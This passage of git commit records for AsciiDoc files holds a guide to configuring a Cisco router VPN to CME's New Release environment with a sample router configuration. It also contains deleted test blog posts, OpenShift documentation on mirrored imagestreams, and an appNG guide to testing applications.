AES\/3DES encryption.\n* ACL - Access Lists. These allow you to choose what traffic can and can not go through your router.\n* NAT - Network Address Translation. This is a technology that allows your router to create a sub network and, through the use of differing ports, pass the traffic through one (public) IP. \"ip nat inside\" tells the vlan to NAT ip that are connected to it, and \"ip nat outside\" tells the interface (you would execute this command on your WAN port) to NAT traffic to the outside world.\n* dot1Q - This is to tell your wireless interface to use a specific vlan. For example \"encapsulation dot1Q 10 native\" uses vlan 10.\n\n== Step 2: Hardware\nIn addition to the 800 series Router, to get started, you'll need a so-called \"Rollover Cable\". http:\/\/www.ebay.com\/sch\/i.html?_nkw=cisco+rollover+usb&_sacat=0\nThis allows you to configure the router over a serial protocol. Use putty to connect, and choose Serial for the method. For my setup, it was COM3 and 9600 baud.\nTo connect to CME you'll need to have two physical interfaces available on your server. One for public IP traffic, and the other for CME New Release traffic. \n\n== Step 3: Big Picture\nCreate two VLANs, one for public IP traffic (\"Vlan 10\"), and the other for CME New Release traffic (\"Vlan 20\"). For wireless models, you'll add the wireless connection to be part of Vlan 10. Assign two of the fast ethernet ports to vlan 10, and the other two to Vlan 20. This will allow you to have two physical connections to public IP and two to New Release. You can always attach a switch to a vlan 10 port to expand access to other devices. To have the appropriate IPs assigned to each VLAN, you'll create two DHCP pools for which IPs can come. On the vlan 10, you can stay with the traditional 192.168.1.x range and on vlan 20, you must use the range that the CME assigns you. \n\nNote for Wireless users: In order to get wireless working propertly, you'll need to create a \"bridge group\". At a high level, this allows you to bridge the physical interface with the wireless interface into the same group. Note: don't assign an IP address range to vlan 10, just tell it to be part of the bridge group and with \"no ip address\". Then, in the bridge group configuration, you will assign the IP range for which the DHCP pool exits. However, for vlan 20 (because it's not part of a bridge group with a wireless interface), you will assign an ip range that matches what CME tells you. \n\n\n== Step 4: Configure Router\n\nOnce you connect to the router, there will be a few key commands that you'll use over and over:\n\n\"write erase\" -- This will erase the \"running-config\" and the \"startup-config\". These are the file names of the two configuration files on the router. \n\"copy running-config startup-config\" -- This will copy the configuration that you have created to be the one run when the router is rebooted.\n\"enable\" -- This will bring the router into priviledged mode so you can issue basic show commands.\n\"config t\" -- This will bring the router into global configuration mode where you can actually change settings.\n\"exit\" -- Go back up one \"level\" in your configuration. For example if you are configuring a sub-interface and want to return back to the interface level, just type exit.\n\"shut\" -- Brings down an interface.\n\"no XXXX\" -- Removes or takes away a command. For example, if you type \"no shut\", then it will bring UP an interface. Likewise, \"no ip pim sparse-mode\" will REMOVE the \"ip pim sparse-mode\" from the configuration. \n\n\nExecute \"write erase\" first (to restore factory configuration).\nNext, \"enable\" to go into priviledged mode.\nThen, \"show running-config\" to see what the initial configuration looks like. \nLastly, \"config t\" so you can start changing settings (you should see the '#' prompt which means you can now issue commands).\n\nOnce you are in this mode, type in the commands from the attached configuration file.\n\n== Step 5: Configure Linux\n\nIn order to get this to work properly, you will need to: 1. diable RP filtering, 2. configure your firewall properly (or just turn it off), and 3. add the appropriate routing table entries so that traffic to CME goes to the correct interface. On the commands that follow, the interface for CME is enp3s0 (change it to match yours).\n\nRouting table:\nroute add -net 69.50.112.0 netmask 255.255.255.0 gw 10.249.71.1 dev enp3s0\n\nTo see if multicast traffic is coming in on the interface:\ntcpdump -i enp3s0 -s0 -vv net 224.0.28.0\/24\n\n\n== Useful Links:\nhttp:\/\/stevehardie.com\/2013\/05\/cisco-877w-configure-wireless-and-wired-on-single-subnet\/\nhttps:\/\/supportforums.cisco.com\/discussion\/11801006\/does-configuring-two-vlans-cisco-871-router-divides-bandwidth-internet-half\nhttps:\/\/supportforums.cisco.com\/discussion\/10567086\/change-ip-router-cisco-871\n\n== Sample Router Configuration\n\n[%hardbreaks]\n\nversion 12.4\nno service pad\nservice timestamps debug datetime msec\nservice timestamps log datetime msec\nno service password-encryption\n!\nhostname Router\n!\nboot-start-marker\nboot-end-marker\n!\n!\nno aaa new-model\n!\nresource policy\n!\nip cef\n!\n!\nno ip dhcp use vrf connected\nip dhcp excluded-address 10.249.71.64 10.249.71.255\n!\nip dhcp pool vlan1pool\n network 10.249.71.0 255.255.255.0\n default-router 10.249.71.1\n dns-server 8.8.8.8\n!\n!\nip multicast-routing\n!\n!\n!\n!\n!\n!\ncrypto isakmp policy 2\n encr 3des\n hash md5\n authentication pre-share\ncrypto isakmp key XXXXXXXXXXXXXXXXXXXXX\n!\n!\ncrypto ipsec transform-set cmevpn esp-3des esp-md5-hmac\n!\ncrypto map cmevpn 1 ipsec-isakmp\n set peer XXX.XXX.XXX.XXX\n set transform-set cmevpn\n match address 100\n!\nbridge irb\n!\n!\n!\ninterface Tunnel0\n ip address XXX.XXX.XXX.XXX 255.255.255.252\n ip pim sparse-mode\n tunnel source XXX.XXX.XXX.XXX\n tunnel destination XXX.XXX.XXX.XXX\n!\ninterface Loopback0\n ip address 10.249.0.229 255.255.255.255\n!\ninterface FastEthernet0\n!\ninterface FastEthernet1\n!\ninterface FastEthernet2\n!\ninterface FastEthernet3\n!\ninterface FastEthernet4\n ip address dhcp\n ip nat outside\n ip virtual-reassembly\n duplex auto\n speed auto\n crypto map cmevpn\n!\ninterface Dot11Radio0\n no ip address\n !\n broadcast-key vlan 1 change 45\n !\n !\n encryption vlan 1 mode ciphers tkip\n !\n ssid YOUR_SSID_NAME\n vlan 1\n authentication open\n authentication key-management wpa\n guest-mode\n wpa-psk ascii 0 YOUR_SSID_PASSWORD\n !\n speed basic-1.0 basic-2.0 basic-5.5 6.0 9.0 basic-11.0 12.0 18.0 24.0 36.0 48.0 54.0\n station-role root\n no cdp enable\n!\ninterface Dot11Radio0.1\n encapsulation dot1Q 1 native\n no cdp enable\n bridge-group 1\n bridge-group 1 subscriber-loop-control\n bridge-group 1 spanning-disabled\n bridge-group 1 block-unknown-source\n no bridge-group 1 source-learning\n no bridge-group 1 unicast-flooding\n!\ninterface Vlan1\n no ip address\n ip access-group 102 in\n bridge-group 1\n bridge-group 1 spanning-disabled\n!\ninterface BVI1\n ip address 10.249.71.1 255.255.255.0\n ip nat inside\n ip virtual-reassembly\n!\nip route 10.249.254.1 255.255.255.255 FastEthernet4\nip route 69.50.112.0 255.255.255.128 Tunnel0\nip route 69.50.112.128 255.255.255.128 FastEthernet4\nip route 69.50.112.254 255.255.255.255 Tunnel0\n!\n!\nno ip http server\nno ip http secure-server\nip pim rp-address XXX.XXX.XXX.XXX\nip mroute 69.50.112.0 255.255.255.128 Tunnel0\nip nat inside source list 1 interface FastEthernet4 overload\n!\naccess-list 1 permit 10.249.71.0 0.0.0.255\n\n\n","old_contents":"= CME New Release VPN\n\nThis guide is written to help others go through the process of configuring a system to connect to the Chicago Mercantile Exchange's New Release environment over a self-hosted VPN connection. It's meant not to be an in-depth explanation of all terms and concepts, but rather a guide\/map to go from a new router to having a working connection.\n\n== Step 1: Router\n\nYou will need a router with built-in ISAKMP and IPSEC capabilities. One of the low cost options is to go with an 800 series Cisco router such as the 871W which you can pick up on Ebay for $50 to $60 and it includes wireless capabilities.\n\nFor those readers who are not networking experts or Cisco CCNAs, there are many acronyms that are used. A few of them are briefly explained here.\nISAKMP - This is part of the security mechanism and is a subset of IKE. http:\/\/networkengineering.stackexchange.com\/questions\/1\/whats-the-difference-between-ike-and-isakmp\n\nGRE - Generic Routing Encapsulation. This allows multicast traffic to be sent over the VPN tunnel. http:\/\/www.cisco.com\/c\/en\/us\/support\/docs\/ip\/ip-multicast\/43584-mcast-over-gre.html\n\nPIM - Protocol Independent Multicast. You'll need to \"enable multicast routing\" and \"pim sparse-mode\" on the router for the multicast traffic. http:\/\/www.cisco.com\/c\/en\/us\/td\/docs\/ios\/solutions_docs\/ip_multicast\/White_papers\/mcst_ovr.html\n\nVLAN - Virtual LAN. Note that on the 871W, you can not assign a specific IP or DHCP group to the physical interfaces. You must assign the interfaces to be part of a VLAN and then the VLAN can be assigned a DHCP pool for IP assignment. \nAdvanced Security or Advanced IP - Cisco offers two flavors of software to run on their routers. The \"PIM\" capabilities are in the Advanced IP package, not the Advanced Security package despite the need for a VPN tunnel! Make sure you are running a package with the K9 designator because it has AES\/3DES encryption.\nACL - Access Lists. These allow you to choose what traffic can and can not go through your router.\nNAT - Network Address Translation. This is a technology that allows your router to create a sub network and, through the use of differing ports, pass the traffic through one (public) IP. \"ip nat inside\" tells the vlan to NAT ip that are connected to it, and \"ip nat outside\" tells the interface (you would execute this command on your WAN port) to NAT traffic to the outside world.\ndot1Q - This is to tell your wireless interface to use a specific vlan. For example \"encapsulation dot1Q 10 native\" uses vlan 10.\n\n== Step 2: Hardware\nIn addition to the 800 series Router, to get started, you'll need a so-called \"Rollover Cable\". http:\/\/www.ebay.com\/sch\/i.html?_nkw=cisco+rollover+usb&_sacat=0\nThis allows you to configure the router over a serial protocol. Use putty to connect, and choose Serial for the method. For my setup, it was COM3 and 9600 baud.\nTo connect to CME you'll need to have two physical interfaces available on your server. One for public IP traffic, and the other for CME New Release traffic. \n\n== Step 3: Big Picture\nCreate two VLANs, one for public IP traffic (\"Vlan 10\"), and the other for CME New Release traffic (\"Vlan 20\"). For wireless models, you'll add the wireless connection to be part of Vlan 10. Assign two of the fast ethernet ports to vlan 10, and the other two to Vlan 20. This will allow you to have two physical connections to public IP and two to New Release. You can always attach a switch to a vlan 10 port to expand access to other devices. To have the appropriate IPs assigned to each VLAN, you'll create two DHCP pools for which IPs can come. On the vlan 10, you can stay with the traditional 192.168.1.x range and on vlan 20, you must use the range that the CME assigns you. \n\nNote for Wireless users: In order to get wireless working propertly, you'll need to create a \"bridge group\". At a high level, this allows you to bridge the physical interface with the wireless interface into the same group. Note: don't assign an IP address range to vlan 10, just tell it to be part of the bridge group and with \"no ip address\". Then, in the bridge group configuration, you will assign the IP range for which the DHCP pool exits. However, for vlan 20 (because it's not part of a bridge group with a wireless interface), you will assign an ip range that matches what CME tells you. \n\n\n== Step 4: Configure Router\n\nOnce you connect to the router, there will be a few key commands that you'll use over and over:\n\n\"write erase\" -- This will erase the \"running-config\" and the \"startup-config\". These are the file names of the two configuration files on the router. \n\"copy running-config startup-config\" -- This will copy the configuration that you have created to be the one run when the router is rebooted.\n\"enable\" -- This will bring the router into priviledged mode so you can issue basic show commands.\n\"config t\" -- This will bring the router into global configuration mode where you can actually change settings.\n\"exit\" -- Go back up one \"level\" in your configuration. For example if you are configuring a sub-interface and want to return back to the interface level, just type exit.\n\"shut\" -- Brings down an interface.\n\"no XXXX\" -- Removes or takes away a command. For example, if you type \"no shut\", then it will bring UP an interface. Likewise, \"no ip pim sparse-mode\" will REMOVE the \"ip pim sparse-mode\" from the configuration. \n\n\nExecute \"write erase\" first (to restore factory configuration).\nNext, \"enable\" to go into priviledged mode.\nThen, \"show running-config\" to see what the initial configuration looks like. \nLastly, \"config t\" so you can start changing settings (you should see the '#' prompt which means you can now issue commands).\n\nOnce you are in this mode, type in the commands from the attached configuration file.\n\n== Step 5: Configure Linux\n\nIn order to get this to work properly, you will need to: 1. diable RP filtering, 2. configure your firewall properly (or just turn it off), and 3. add the appropriate routing table entries so that traffic to CME goes to the correct interface. On the commands that follow, the interface for CME is enp3s0 (change it to match yours).\n\nRouting table:\nroute add -net 69.50.112.0 netmask 255.255.255.0 gw 10.249.71.1 dev enp3s0\n\nTo see if multicast traffic is coming in on the interface:\ntcpdump -i enp3s0 -s0 -vv net 224.0.28.0\/24\n\n\n== Useful Links:\nhttp:\/\/stevehardie.com\/2013\/05\/cisco-877w-configure-wireless-and-wired-on-single-subnet\/\nhttps:\/\/supportforums.cisco.com\/discussion\/11801006\/does-configuring-two-vlans-cisco-871-router-divides-bandwidth-internet-half\nhttps:\/\/supportforums.cisco.com\/discussion\/10567086\/change-ip-router-cisco-871\n\n== Sample Router Configuration\n\n[%hardbreaks]\n\nversion 12.4\nno service pad\nservice timestamps debug datetime msec\nservice timestamps log datetime msec\nno service password-encryption\n!\nhostname Router\n!\nboot-start-marker\nboot-end-marker\n!\n!\nno aaa new-model\n!\nresource policy\n!\nip cef\n!\n!\nno ip dhcp use vrf connected\nip dhcp excluded-address 10.249.71.64 10.249.71.255\n!\nip dhcp pool vlan1pool\n network 10.249.71.0 255.255.255.0\n default-router 10.249.71.1\n dns-server 8.8.8.8\n!\n!\nip multicast-routing\n!\n!\n!\n!\n!\n!\ncrypto isakmp policy 2\n encr 3des\n hash md5\n authentication pre-share\ncrypto isakmp key XXXXXXXXXXXXXXXXXXXXX\n!\n!\ncrypto ipsec transform-set cmevpn esp-3des esp-md5-hmac\n!\ncrypto map cmevpn 1 ipsec-isakmp\n set peer XXX.XXX.XXX.XXX\n set transform-set cmevpn\n match address 100\n!\nbridge irb\n!\n!\n!\ninterface Tunnel0\n ip address XXX.XXX.XXX.XXX 255.255.255.252\n ip pim sparse-mode\n tunnel source XXX.XXX.XXX.XXX\n tunnel destination XXX.XXX.XXX.XXX\n!\ninterface Loopback0\n ip address 10.249.0.229 255.255.255.255\n!\ninterface FastEthernet0\n!\ninterface FastEthernet1\n!\ninterface FastEthernet2\n!\ninterface FastEthernet3\n!\ninterface FastEthernet4\n ip address dhcp\n ip nat outside\n ip virtual-reassembly\n duplex auto\n speed auto\n crypto map cmevpn\n!\ninterface Dot11Radio0\n no ip address\n !\n broadcast-key vlan 1 change 45\n !\n !\n encryption vlan 1 mode ciphers tkip\n !\n ssid YOUR_SSID_NAME\n vlan 1\n authentication open\n authentication key-management wpa\n guest-mode\n wpa-psk ascii 0 YOUR_SSID_PASSWORD\n !\n speed basic-1.0 basic-2.0 basic-5.5 6.0 9.0 basic-11.0 12.0 18.0 24.0 36.0 48.0 54.0\n station-role root\n no cdp enable\n!\ninterface Dot11Radio0.1\n encapsulation dot1Q 1 native\n no cdp enable\n bridge-group 1\n bridge-group 1 subscriber-loop-control\n bridge-group 1 spanning-disabled\n bridge-group 1 block-unknown-source\n no bridge-group 1 source-learning\n no bridge-group 1 unicast-flooding\n!\ninterface Vlan1\n no ip address\n ip access-group 102 in\n bridge-group 1\n bridge-group 1 spanning-disabled\n!\ninterface BVI1\n ip address 10.249.71.1 255.255.255.0\n ip nat inside\n ip virtual-reassembly\n!\nip route 10.249.254.1 255.255.255.255 FastEthernet4\nip route 69.50.112.0 255.255.255.128 Tunnel0\nip route 69.50.112.128 255.255.255.128 FastEthernet4\nip route 69.50.112.254 255.255.255.255 Tunnel0\n!\n!\nno ip http server\nno ip http secure-server\nip pim rp-address XXX.XXX.XXX.XXX\nip mroute 69.50.112.0 255.255.255.128 Tunnel0\nip nat inside source list 1 interface FastEthernet4 overload\n!\naccess-list 1 permit 10.249.71.0 0.0.0.255\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"012cfc1ddf540c3393717b55a3d3d6d0013ce874","subject":"Delete 2015-02-09-Test.adoc","message":"Delete 2015-02-09-Test.adoc","repos":"ludolphus\/hubpress.io,ludolphus\/hubpress.io,ludolphus\/hubpress.io","old_file":"_posts\/2015-02-09-Test.adoc","new_file":"_posts\/2015-02-09-Test.adoc","new_contents":"","old_contents":"# Test\n\nSo this works. More soon...","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"00d4498949bb1752a754aeea42e886f377133fdd","subject":"Delete 2015-05-14-Yeah.adoc","message":"Delete 2015-05-14-Yeah.adoc","repos":"flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io","old_file":"_posts\/2015-05-14-Yeah.adoc","new_file":"_posts\/2015-05-14-Yeah.adoc","new_contents":"","old_contents":"Yeah\n=====","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"4c1f666124493a74e809bea776e310682357f5d3","subject":"Delete the file at '_posts\/2017-06-12-Test.adoc'","message":"Delete the file at '_posts\/2017-06-12-Test.adoc'","repos":"Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io","old_file":"_posts\/2017-06-12-Test.adoc","new_file":"_posts\/2017-06-12-Test.adoc","new_contents":"","old_contents":"= Test\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\ntest blog\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"be284148e0b2f4ae5e0f947c5efd2c29ac0416a3","subject":"PR17978 Follow-up - fix command","message":"PR17978 Follow-up - fix command\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/installation-restricted-network-samples.adoc","new_file":"modules\/installation-restricted-network-samples.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * installing\/install_config\/installing-restricted-networks-preparations.adoc\n\/\/ * openshift_images\/samples-operator-alt-registry.adoc\n\nifeval::[\"{context}\" == \"installing-restricted-networks-preparations\"]\n:restrictednetwork:\nendif::[]\n\nifeval::[\"{context}\" == \"samples-operator-alt-registry\"]\n:samplesoperatoraltreg:\nendif::[]\n\n[id=\"installation-restricted-network-samples_{context}\"]\n= Using Samples Operator imagestreams with alternate or mirrored registries\n\nMost imagestreams in the OpenShift namespace managed by the Samples Operator\npoint to images located in the Red Hat registry at link:registry.redhat.io[registry.redhat.io].\nifdef::restrictednetwork[]\nMirroring\nwill not apply to these imagestreams.\nendif::[]\nThe `jenkins`, `jenkins-agent-maven`, and `jenkins-agent-nodejs` imagestreams\ncome from the install payload and are managed by the Samples\nifdef::restrictednetwork[]\nOperator, so no further mirroring procedures are needed for those imagestreams.\nendif::[]\nifdef::samplesoperatoraltreg[]\nOperator.\nendif::[]\n\n[NOTE]\n====\nThe `cli`, `installer`, `must-gather`, and `tests` imagestreams, while\npart of the install payload, are not managed by the Samples Operator. These are\nnot addressed in this procedure.\n====\n\n.Prerequisites\n* Access to the cluster as a user with the `cluster-admin` role.\n* Create a pull secret for your mirror registry.\n\n.Procedure\n\n. Access the images of a specific imagestream to mirror, for example:\n+\n----\n$ oc get is <imagestream> -n openshift -o json | jq .spec.tags[].from.name | grep registry.redhat.io\n----\n+\n. Mirror images from link:registry.redhat.io[registry.redhat.io] associated with any imagestreams you need\nifdef::restrictednetwork[]\nin the restricted network environment into one of the defined mirrors, for example:\nendif::[]\nifdef::configsamplesoperator[]\ninto your defined preferred registry, for example:\nendif::[]\n+\n----\n$ oc image mirror registry.redhat.io\/rhscl\/ruby-25-rhel7:latest ${MIRROR_ADDR}\/rhscl\/ruby-25-rhel7:latest\n----\n+\n. Add the required trusted CAs for the mirror in the cluster\u2019s image\nconfiguration object:\n+\n----\n$ oc create configmap registry-config --from-file=${MIRROR_ADDR_HOSTNAME}..5000=$path\/ca.crt -n openshift-config\n$ oc patch image.config.openshift.io\/cluster --patch '{\"spec\":{\"additionalTrustedCA\":{\"name\":\"registry-config\"}}}' --type=merge\n----\n+\n. Update the `samplesRegistry` field in the Samples Operator configuration object\nto contain the `hostname` portion of the mirror location defined in the mirror\nconfiguration:\n+\n----\n$ oc get configs.samples.operator.openshift.io -n openshift-cluster-samples-operator\n----\n+\n[NOTE]\n====\nThis is required because the imagestream import process does not use the mirror or search mechanism at this time.\n====\n+\n. Add any imagestreams that are not mirrored into the `skippedImagestreams` field\nof the Samples Operator configuration object. Or if you do not want to support\nany of the sample imagestreams, set the Samples Operator to `Removed` in the\nSamples Operator configuration object.\n+\n[NOTE]\n====\nAny unmirrored imagestreams that are not skipped, or if the Samples Operator is\nnot changed to `Removed`, will result in the Samples Operator reporting a\n`Degraded` status two hours after the imagestream imports start failing.\n====\n+\nMany of the templates in the OpenShift namespace\nreference the imagestreams. So using `Removed` to purge both the imagestreams\nand templates will eliminate the possibility of attempts to use them if they\nare not functional because of any missing imagestreams.\n\nifeval::[\"{context}\" == \"installing-restricted-networks-preparations\"]\n:!restrictednetwork:\nendif::[]\n\nifeval::[\"{context}\" == \"samples-operator-alt-registry\"]\n:!samplesoperatoraltreg:\nendif::[]\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * installing\/install_config\/installing-restricted-networks-preparations.adoc\n\/\/ * openshift_images\/samples-operator-alt-registry.adoc\n\nifeval::[\"{context}\" == \"installing-restricted-networks-preparations\"]\n:restrictednetwork:\nendif::[]\n\nifeval::[\"{context}\" == \"samples-operator-alt-registry\"]\n:samplesoperatoraltreg:\nendif::[]\n\n[id=\"installation-restricted-network-samples_{context}\"]\n= Using Samples Operator imagestreams with alternate or mirrored registries\n\nMost imagestreams in the OpenShift namespace managed by the Samples Operator\npoint to images located in the Red Hat registry at link:registry.redhat.io[registry.redhat.io].\nifdef::restrictednetwork[]\nMirroring\nwill not apply to these imagestreams.\nendif::[]\nThe `jenkins`, `jenkins-agent-maven`, and `jenkins-agent-nodejs` imagestreams\ncome from the install payload and are managed by the Samples \nifdef::restrictednetwork[]\nOperator, so no further mirroring procedures are needed for those imagestreams.\nendif::[]\nifdef::samplesoperatoraltreg[]\nOperator.\nendif::[]\n\n[NOTE]\n====\nThe `cli`, `installer`, `must-gather`, and `tests` imagestreams, while\npart of the install payload, are not managed by the Samples Operator. These are\nnot addressed in this procedure.\n====\n\n.Prerequisites\n* Access to the cluster as a user with the `cluster-admin` role.\n* Create a pull secret for your mirror registry.\n\n.Procedure\n\n. Access the images of a specific imagestream to mirror, for example:\n+\n----\n$ oc get is <imagestream> -n openshift -o json | jq .spec.tags[].from.name | grep registry.redhat.io\n----\n+\n. Mirror images from link:registry.redhat.io[registry.redhat.io] associated with any imagestreams you need\nifdef::restrictednetwork[]\nin the restricted network environment into one of the defined mirrors, for example:\nendif::[]\nifdef::configsamplesoperator[]\ninto your defined preferred registry, for example:\nendif::[]\n+\n----\n$ oc image mirror registry.redhat.io\/rhscl\/ruby-25-rhel7:latest ${MIRROR_ADDR}\/rhscl\/ruby-25-rhel7:latest\n----\n+\n. Add the required trusted CAs for the mirror in the cluster\u2019s image\nconfiguration object:\n+\n----\n$ oc create configmap registry-config --from-file={MIRROR_ADDR}=$path\/ca.crt -n openshift-config\n$ oc patch image.config.openshift.io\/cluster --patch '{\"spec\":{\"additionalTrustedCA\":{\"name\":\"registry-config\"}}}' --type=merge\n----\n+\n. Update the `samplesRegistry` field in the Samples Operator configuration object\nto contain the `hostname` portion of the mirror location defined in the mirror\nconfiguration:\n+\n----\n$ oc get configs.samples.operator.openshift.io -n openshift-cluster-samples-operator\n----\n+\n[NOTE]\n====\nThis is required because the imagestream import process does not use the mirror or search mechanism at this time.\n====\n+\n. Add any imagestreams that are not mirrored into the `skippedImagestreams` field\nof the Samples Operator configuration object. Or if you do not want to support\nany of the sample imagestreams, set the Samples Operator to `Removed` in the\nSamples Operator configuration object.\n+\n[NOTE]\n====\nAny unmirrored imagestreams that are not skipped, or if the Samples Operator is\nnot changed to `Removed`, will result in the Samples Operator reporting a\n`Degraded` status two hours after the imagestream imports start failing.\n====\n+\nMany of the templates in the OpenShift namespace\nreference the imagestreams. So using `Removed` to purge both the imagestreams\nand templates will eliminate the possibility of attempts to use them if they\nare not functional because of any missing imagestreams.\n\nifeval::[\"{context}\" == \"installing-restricted-networks-preparations\"]\n:!restrictednetwork:\nendif::[]\n\nifeval::[\"{context}\" == \"samples-operator-alt-registry\"]\n:!samplesoperatoraltreg:\nendif::[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83c199f64c555aa71e65f8886a9986ee56f06457","subject":"BZ-1715395: Updated block volume support.","message":"BZ-1715395: Updated block volume support.\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/storage-persistent-storage-block-volume.adoc","new_file":"modules\/storage-persistent-storage-block-volume.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * storage\/understanding-persistent-storage.adoc\n\/\/\n\/\/ This module should only be present in openshift-enterprise and\n\/\/ openshift-origin distributions.\n\n[id=\"block-volume-support_{context}\"]\n= Block volume support\n\nYou can statically provision raw block volumes by including API fields\nin your PV and PVC specifications.\n\nThe following table displays which volume plug-ins support block volumes.\n\n.Block volume support\n[cols=\"1,1,1\", width=\"100%\",options=\"header\"]\n|===\n|Volume Plug-in |Manually provisioned |Dynamically provisioned\n|AWS EBS | \u2705 | \u2705\n|Fibre Channel | \u2705 |\n|HostPath | |\n|iSCSI | \u2705 |\n|NFS | |\n|VMWare vSphere | \u2705 | \u2705\n|===\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * storage\/understanding-persistent-storage.adoc\n\/\/\n\/\/ This module should only be present in openshift-enterprise and\n\/\/ openshift-origin distributions.\n\n[id=\"block-volume-support_{context}\"]\n= Block volume support\n\nYou can statically provision raw block volumes by including API fields\nin your PV and PVC specifications. This functionality is only available for\nmanually provisioned PVs.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d6d10884ff90ebb01553966b0f99385c528a819d","subject":"APPNG-2068 fix constructor's name","message":"APPNG-2068 fix constructor's name","repos":"appNG\/appng,appNG\/appng,appNG\/appng","old_file":"appng-documentation\/src\/main\/asciidoc\/parts\/testing.adoc","new_file":"appng-documentation\/src\/main\/asciidoc\/parts\/testing.adoc","new_contents":"== Testing\n=== General\nAppNG also offers support for unit- and integration testing your appNG applications. Therefore, it uses the testing capabilities of the Spring framework. See the {spring}\/spring-framework-reference\/htmlsingle\/#testing[Reference Documentation^] for details on testing with Spring.\n\nTo enable test support, just add the following dependency to your `pom.xml`:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.appng<\/groupId>\n <artifactId>appng-testsupport<\/artifactId>\n <version>${appNG.version}<\/version>\n<\/dependency>\n----\n\nNext, use {appng}\/org\/appng\/testsupport\/TestBase.html[org.appng.testsupport.TestBase^] as a base class for your unit tests. You can test with or without JPA support enabled.\n\nWithout JPA support:\n[source,java]\n----\n@org.springframework.test.context.ContextConfiguration(initializers = MyTest.class)\npublic class EmployeesTest extends TestBase {\n\n public EmployeesTest() {\n super(\"myapp\", \"application-home\");\n }\n \n}\n----\n\nWith JPA support:\n[source,java]\n----\n@org.springframework.test.context.ContextConfiguration(\n locations = { TestBase.TESTCONTEXT_JPA }, initializers = MyTest.class)\npublic class EmployeesTest extends TestBase {\n\n public EmployeesTest() {\n super(\"myapp\", \"application-home\");\n setEntityPackage(\"com.myapp.domain\");\n setRepositoryBase(\"com.myapp.repository\");\n }\n \n}\n----\n\n=== Testing a datasource:\n[source,java]\n----\n@org.junit.Test\npublic void testShowEmployees() throws ProcessingException, IOException {\n\taddParameter(\"selectedId\", \"1\"); \/\/ <!--1-->\n\tinitParameters(); \/\/ <!--2-->\n\tDataSourceCall dataSourceCall = getDataSource(\"employees\");\/\/ <!--3-->\n\tCallableDataSource callableDataSource = dataSourceCall.getCallableDataSource(); \/\/ <!--4-->\n\tcallableDataSource.perform(\"aPage\"); \/\/ <!--5-->\n\tvalidate(callableDataSource.getDatasource());\/\/ <!--6-->\n}\n----\n<1> adds a parameter\n<2> initialize the parameters, must be called after parameters have been added\n<3> retrieve a `DataSourceCall` representing the datasource by its id\n<4> get a `CallableDataSource`\n<5> perform the `CallableDataSource`\n<6> validate the response\n\nIn step 6, a {appng}\/org\/appng\/testsupport\/validation\/WritingXmlValidator.html[org.appng.testsupport.validation.WritingXmlValidator^] is used to compare the contents of a *control file* with the XML that results from marshalling the given object (in this case a `org.appng.xml.platform.Datasource`). The control file must be located at `src\/test\/resources\/xml`. It's name is derived from the name of the test class and the name of the test method. So in this example, it would be `EmployeesTest-testShowEmployees.xml`.\n\nNOTE: For initially creating and later updating your control files, just set `WritingXmlValidator.writeXml = true` and the control files will be written to `src\/test\/resources\/xml`. \n\n=== Testing an action:\n[source,java]\n----\n@org.junit.Test\npublic void testCreateEmployee() throws ProcessingException, IOException {\n\tActionCall action = getAction(\"employeeEvent\", \"create\");\/\/ <!--1-->\n\taction.withParam(FORM_ACTION, \"create\");\/\/ <!--2-->\n\tEmployee formBean = new Employee(\"John\", \"Doe\");\/\/ <!--3-->\n\tCallableAction callableAction = action.getCallableAction(formBean);\/\/ <!--4-->\n\tFieldProcessor fieldProcessor = callableAction.perform();\/\/ <!--5-->\n\tvalidate(fieldProcessor.getMessages(), \"-messages\");\/\/ <!--6-->\n\tvalidate(callableAction.getAction(), \"-action\");\/\/ <!--7-->\n}\n----\n<1> retrieve an `ActionCall` representing the action by its event-id and id\n<2> add required parameters to the action\n<3> create a form bean\n<4> retrieve a `CallableAction`\n<5> perform the `CallableAction` receive a `FieldProcessor`\n<6> use a `validate(...)`-method that takes a suffix as a parameter, validating the messages of the `fieldProcessor`\n<7> use the same validate method to validte the contents of the action\n\nNOTE: Although you pass the `formBean` as a whole to `ActionCall.getCallableAction(formBean)`, this `formBean` is being copied internally. This copy, which is passed to the `ActionProvider<T>`, will contain only those properties that are mapped and writable in the datasource used by the action.\n\n=== Adding custom bean definitions for testing\nYou can add custom bean definitons for your tests. For example, if you want to run a SQL script to initialize your test database, you could provide a file `beans-test-xml` located at `src\/test\/resources`.\n\n.beans-test.xml\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n 